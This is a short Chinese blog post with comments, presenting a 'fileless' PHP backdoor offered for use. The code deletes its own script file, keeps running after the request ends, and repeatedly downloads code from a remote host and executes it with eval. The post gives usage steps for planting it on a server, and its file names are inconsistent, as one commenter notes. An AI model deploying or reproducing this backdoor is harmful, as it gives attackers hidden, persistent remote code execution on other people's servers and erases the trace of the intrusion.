PHP 无文件后门

2013-10-09
安全
4 条评论
7.58K次阅读

webshell.php

<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);

$remote_file = 'http://xsser.me/webshel.txt';
while($code = file_get_contents($remote_file)){
  @eval($code);
  sleep(5);
};
?>

eval.txt

file_put_contents('1.txt','hello world '.time());

使用方式

将 webshel.php 传到服务器之后访问一次他会自删除。但，依然会在后台执行 eval.txt 中的代码。

停止执行

删除或清空 webshel.txt。

缺点

服务器或WEB容器一重启后门就没了。

转载请注明来自WebShell'S Blog，本文地址：https://www.webshell.cc/4444.html

file PHP txt

已有 4 条评论

昌维

2014/07/27 18:23

万一eval函数禁用了怎么办啊

回复
新一

2013/11/20 16:41

有eval都会被爆的吧。

回复
kim

2013/11/19 15:21

很鸡肋啊~会循环执行eval.txt 中的php code 而且更换php code 不方便

回复
月小升

2013/10/23 12:40

没看到webshel.php调用eval.txt的地方呢。怎么会运行这个文件呢。

回复

添加新评论

上一篇: IIS详细错误代码以及解释
下一篇: pangolin professinal edition 4.0.0.1293特别版

PHP 无文件后门

已有 4 条评论

添加新评论

近期文章

标签